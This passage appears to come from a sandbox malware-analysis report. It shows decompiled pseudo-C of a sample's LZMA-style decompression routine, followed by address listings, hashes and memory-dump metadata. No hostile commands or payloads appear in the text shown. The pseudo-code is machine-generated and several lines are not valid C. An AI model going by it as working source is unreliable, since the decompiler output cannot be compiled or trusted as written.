                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          												goto L120;
                                                          											case 0x16:
                                                          												__eax =  *(__ebp - 0x30);
                                                          												__eflags = __eax - 4;
                                                          												if(__eax >= 4) {
                                                          													_push(3);
                                                          													_pop(__eax);
                                                          												}
                                                          												__ecx =  *(__ebp - 4);
                                                          												 *(__ebp - 0x40) = 6;
                                                          												__eax = __eax << 7;
                                                          												 *(__ebp - 0x7c) = 0x19;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L145;
                                                          											case 0x17:
                                                          												L145:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												 *(__ebp - 0x50) = 1;
                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          												goto L149;
                                                          											case 0x18:
                                                          												L146:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x18;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t484 = __ebp - 0x70;
                                                          												 *_t484 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t484;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L148:
                                                          												_t487 = __ebp - 0x48;
                                                          												 *_t487 =  *(__ebp - 0x48) - 1;
                                                          												__eflags =  *_t487;
                                                          												L149:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__ecx =  *(__ebp - 0x40);
                                                          													__ebx =  *(__ebp - 0x50);
                                                          													0 = 1;
                                                          													__eax = 1 << __cl;
                                                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          													__eax =  *(__ebp - 0x7c);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													while(1) {
                                                          														 *(_t613 - 0x88) = _t533;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x50);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__esi = __edx + __eax;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__ax =  *__esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													__cx = __ax >> 5;
                                                          													__eax = __eax - __ecx;
                                                          													__edx = __edx + 1;
                                                          													__eflags = __edx;
                                                          													 *__esi = __ax;
                                                          													 *(__ebp - 0x50) = __edx;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L148;
                                                          												} else {
                                                          													goto L146;
                                                          												}
                                                          											case 0x19:
                                                          												__eflags = __ebx - 4;
                                                          												if(__ebx < 4) {
                                                          													 *(__ebp - 0x2c) = __ebx;
                                                          													L119:
                                                          													_t393 = __ebp - 0x2c;
                                                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          													__eflags =  *_t393;
                                                          													L120:
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													__eflags = __eax;
                                                          													if(__eax == 0) {
                                                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          														goto L170;
                                                          													}
                                                          													__eflags = __eax -  *(__ebp - 0x60);
                                                          													if(__eax >  *(__ebp - 0x60)) {
                                                          														goto L171;
                                                          													}
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          													__eax =  *(__ebp - 0x30);
                                                          													_t400 = __ebp - 0x60;
                                                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          													__eflags =  *_t400;
                                                          													goto L123;
                                                          												}
                                                          												__ecx = __ebx;
                                                          												__eax = __ebx;
                                                          												__ecx = __ebx >> 1;
                                                          												__eax = __ebx & 0x00000001;
                                                          												__ecx = (__ebx >> 1) - 1;
                                                          												__al = __al | 0x00000002;
                                                          												__eax = (__ebx & 0x00000001) << __cl;
                                                          												__eflags = __ebx - 0xe;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												if(__ebx >= 0xe) {
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x48) = __ecx;
                                                          													L102:
                                                          													__eflags =  *(__ebp - 0x48);
                                                          													if( *(__ebp - 0x48) <= 0) {
                                                          														__eax = __eax + __ebx;
                                                          														 *(__ebp - 0x40) = 4;
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          														__eax =  *(__ebp - 4);
                                                          														__eax =  *(__ebp - 4) + 0x644;
                                                          														__eflags = __eax;
                                                          														L108:
                                                          														__ebx = 0;
                                                          														 *(__ebp - 0x58) = __eax;
                                                          														 *(__ebp - 0x50) = 1;
                                                          														 *(__ebp - 0x44) = 0;
                                                          														 *(__ebp - 0x48) = 0;
                                                          														L112:
                                                          														__eax =  *(__ebp - 0x40);
                                                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          															_t391 = __ebp - 0x2c;
                                                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          															__eflags =  *_t391;
                                                          															goto L119;
                                                          														}
                                                          														__eax =  *(__ebp - 0x50);
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          														__eax =  *(__ebp - 0x58);
                                                          														__esi = __edi + __eax;
                                                          														 *(__ebp - 0x54) = __esi;
                                                          														__ax =  *__esi;
                                                          														__ecx = __ax & 0x0000ffff;
                                                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          														__eflags =  *(__ebp - 0xc) - __edx;
                                                          														if( *(__ebp - 0xc) >= __edx) {
                                                          															__ecx = 0;
                                                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          															__ecx = 1;
                                                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          															__ebx = 1;
                                                          															__ecx =  *(__ebp - 0x48);
                                                          															__ebx = 1 << __cl;
                                                          															__ecx = 1 << __cl;
                                                          															__ebx =  *(__ebp - 0x44);
                                                          															__ebx =  *(__ebp - 0x44) | __ecx;
                                                          															__cx = __ax;
                                                          															__cx = __ax >> 5;
                                                          															__eax = __eax - __ecx;
                                                          															__edi = __edi + 1;
                                                          															__eflags = __edi;
                                                          															 *(__ebp - 0x44) = __ebx;
                                                          															 *__esi = __ax;
                                                          															 *(__ebp - 0x50) = __edi;
                                                          														} else {
                                                          															 *(__ebp - 0x10) = __edx;
                                                          															0x800 = 0x800 - __ecx;
                                                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          															 *__esi = __dx;
                                                          														}
                                                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          														if( *(__ebp - 0x10) >= 0x1000000) {
                                                          															L111:
                                                          															_t368 = __ebp - 0x48;
                                                          															 *_t368 =  *(__ebp - 0x48) + 1;
                                                          															__eflags =  *_t368;
                                                          															goto L112;
                                                          														} else {
                                                          															goto L109;
                                                          														}
                                                          													}
                                                          													__ecx =  *(__ebp - 0xc);
                                                          													__ebx = __ebx + __ebx;
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          														__ecx =  *(__ebp - 0x10);
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          														__ebx = __ebx | 0x00000001;
                                                          														__eflags = __ebx;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L101:
                                                          														_t338 = __ebp - 0x48;
                                                          														 *_t338 =  *(__ebp - 0x48) - 1;
                                                          														__eflags =  *_t338;
                                                          														goto L102;
                                                          													} else {
                                                          														goto L99;
                                                          													}
                                                          												}
                                                          												__edx =  *(__ebp - 4);
                                                          												__eax = __eax - __ebx;
                                                          												 *(__ebp - 0x40) = __ecx;
                                                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          												goto L108;
                                                          											case 0x1a:
                                                          												L56:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1a;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x68);
                                                          												__al =  *(__ebp - 0x5c);
                                                          												__edx =  *(__ebp - 8);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *( *(__ebp - 0x68)) = __al;
                                                          												__ecx =  *(__ebp - 0x14);
                                                          												 *(__ecx +  *(__ebp - 8)) = __al;
                                                          												__eax = __ecx + 1;
                                                          												__edx = 0;
                                                          												_t192 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t192;
                                                          												goto L80;
                                                          											case 0x1b:
                                                          												L76:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1b;
                                                          													goto L170;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t275 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t275;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												_t284 = __ebp - 0x64;
                                                          												 *_t284 =  *(__ebp - 0x64) - 1;
                                                          												__eflags =  *_t284;
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												L80:
                                                          												 *(__ebp - 0x14) = __edx;
                                                          												goto L81;
                                                          											case 0x1c:
                                                          												while(1) {
                                                          													L123:
                                                          													__eflags =  *(__ebp - 0x64);
                                                          													if( *(__ebp - 0x64) == 0) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__edx =  *(__ebp - 8);
                                                          													__cl =  *(__eax + __edx);
                                                          													__eax =  *(__ebp - 0x14);
                                                          													 *(__ebp - 0x5c) = __cl;
                                                          													 *(__eax + __edx) = __cl;
                                                          													__eax = __eax + 1;
                                                          													__edx = 0;
                                                          													_t414 = __eax %  *(__ebp - 0x74);
                                                          													__eax = __eax /  *(__ebp - 0x74);
                                                          													__edx = _t414;
                                                          													__eax =  *(__ebp - 0x68);
                                                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          													__eflags =  *(__ebp - 0x30);
                                                          													 *( *(__ebp - 0x68)) = __cl;
                                                          													 *(__ebp - 0x14) = _t414;
                                                          													if( *(__ebp - 0x30) > 0) {
                                                          														continue;
                                                          													} else {
                                                          														L81:
                                                          														 *(__ebp - 0x88) = 2;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												 *(__ebp - 0x88) = 0x1c;
                                                          												goto L170;
                                                          										}
                                                          									}
                                                          									L171:
                                                          									_t535 = _t534 | 0xffffffff;
                                                          									goto L172;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L1;
                                                          				}
                                                          			}













                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x0040676b
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00406771
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
                                                          • Instruction ID: e3f6d56364c83544c85f79d99d02007aa6d07438f45ea059adc5b55077a757f2
                                                          • Opcode Fuzzy Hash: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
                                                          • Instruction Fuzzy Hash: 30714671D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E0040638C() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						 *(_t613 - 0x84) = 0xa;
                                                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                          					} else {
                                                          						 *(__ebp - 0x84) = 9;
                                                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          					}
                                                          					while(1) {
                                                          						 *(_t613 - 0x54) = _t606;
                                                          						while(1) {
                                                          							L133:
                                                          							_t531 =  *_t606;
                                                          							_t589 = _t531 & 0x0000ffff;
                                                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          							if( *(_t613 - 0xc) >= _t565) {
                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          								 *(_t613 - 0x40) = 1;
                                                          								_t532 = _t531 - (_t531 >> 5);
                                                          								 *_t606 = _t532;
                                                          							} else {
                                                          								 *(_t613 - 0x10) = _t565;
                                                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          							}
                                                          							if( *(_t613 - 0x10) >= 0x1000000) {
                                                          								goto L139;
                                                          							}
                                                          							L137:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 5;
                                                          								L170:
                                                          								_t568 = 0x22;
                                                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          								_t535 = 0;
                                                          								L172:
                                                          								return _t535;
                                                          							}
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							L139:
                                                          							_t533 =  *(_t613 - 0x84);
                                                          							while(1) {
                                                          								 *(_t613 - 0x88) = _t533;
                                                          								while(1) {
                                                          									L1:
                                                          									_t534 =  *(_t613 - 0x88);
                                                          									if(_t534 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
                                                          										case 0:
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          											_t534 =  *( *(_t613 - 0x70));
                                                          											if(_t534 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											_t538 = _t534 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t570);
                                                          											_push(9);
                                                          											_pop(_t571);
                                                          											_t609 = _t538 / _t570;
                                                          											_t540 = _t538 % _t570 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t604 = _t540 % _t571 & 0x000000ff;
                                                          											 *(_t613 - 0x3c) = _t604;
                                                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          												L10:
                                                          												if(_t612 == 0) {
                                                          													L12:
                                                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t612 = _t612 - 1;
                                                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          												} while (_t612 != 0);
                                                          												goto L12;
                                                          											}
                                                          											if( *(_t613 - 4) != 0) {
                                                          												GlobalFree( *(_t613 - 4));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t613 - 4) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t613 - 0x6c);
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												 *(_t613 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          											_t45 = _t613 - 0x48;
                                                          											 *_t45 =  *(_t613 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
